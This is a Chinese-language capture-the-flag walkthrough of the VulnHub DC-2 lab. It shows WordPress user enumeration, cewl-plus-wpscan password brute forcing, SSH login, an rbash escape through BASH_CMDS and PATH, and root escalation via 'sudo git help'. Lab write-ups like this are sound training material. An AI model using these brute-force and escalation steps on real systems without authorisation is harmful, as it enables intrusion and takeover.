DC-2靶机练习
DC-2靶机练习
搭建靶场
https://www.vulnhub.com/entry/dc-2,311/
下载下来安装就OK
信息搜集
IP搜集
nmap -sP 192.168.45.0/24

这里通过查看自己的ip就知道我们靶机的ip是192.168.45.139
这里访问ip的时候会有一个小插曲就是,这个是进行了域名绑定的,所以我们得修改一下host文件
网页搜集

Flag
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
你通常的单词表可能不起作用,所以相反,也许你只需要成为 cewl。
密码越多越好,但有时你无法赢得所有密码。
以 one 身份登录以查看下一个标志。
如果找不到它,请以另一个人身份登录。
通过提示,我们知道这里是需要密码爆破。

看到这个是使用WordPress进行内容管理的,还有就是这个是php为编程语言
所以这里肯定得试一试目录扫描,看一看wordpress管理后台能不能爆破密码。
渗透测试
wordpress后台登录
根据上面的提示我们就会发现,需要cewl来进行我们的密码爆破的,
但是我们首先还是先看一看wordpress的版本,看看有没有历史漏洞

wordpress的版本4.7.10,搜索一下漏洞

感觉这里大概没有
查找用户
wpscan --url http://dc-2 --enumerate u
admin,jerry,tom这三个用户名
生成密码
cewl http://dc-2/ > passwd.txt
爆破登录
wpscan --url http://dc-2 --passwords passwd.txt

| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
如果你不能利用WordPress并走捷径,还有另一种方法。
希望你找到了另一个切入点。
这里提示我们不能继续利用这个点了
SSH登录后台
根据提示结合我们的两对账号密码,可以尝试去使用ssh连接一下
ssh -p 7744 jerry@192.168.45.139
ssh -p 7744 tom@192.168.45.139


jerry的账号无法使用账号密码登录,tom连接成功,我们可以看到里面有flag3.txt
但是我们是没有办法查看的

FLAG3
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
可怜的老汤姆总是追着杰瑞跑。或许他应该为了所造成的所有压力而su(切换用户)。
rbash绕过
简单来说,rbash会禁用很多的命令,上面提示里面的su命令肯定也会被禁用,所以我们这里得rbash逃逸
BASH_CMDS[su]=/bin/sh
适用bash的内部关联数组,将su映射到/bin/sh,实现交互界面

但是我们还是不能执行我们想要的命令
export PATH=$PATH:/usr/bin/
export PATH=$PATH:/bin/
这里添加环境变量之后就可以执行命令了。

Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
很高兴看到你已经走到这一步了 - 但你还没有到家。
你仍然需要获得最终的标志(唯一真正重要的标志!!!)。
这里没有提示 - 现在只能靠你自己了。 :-)
git提权
sudo git help config
!/bin/bash或者!'sh'完成提权
sudo git -p help
!/bin/bash

总结
- 修改host文件,解决
- wpsacn结合cewl爆破账号密码,登录后台
- ssh尝试连接的账号和密码
- 使用内部数组进入交互实现,rbash的绕过
- 利用git查看帮助,进行sudo提权

浙公网安备 33010602011771号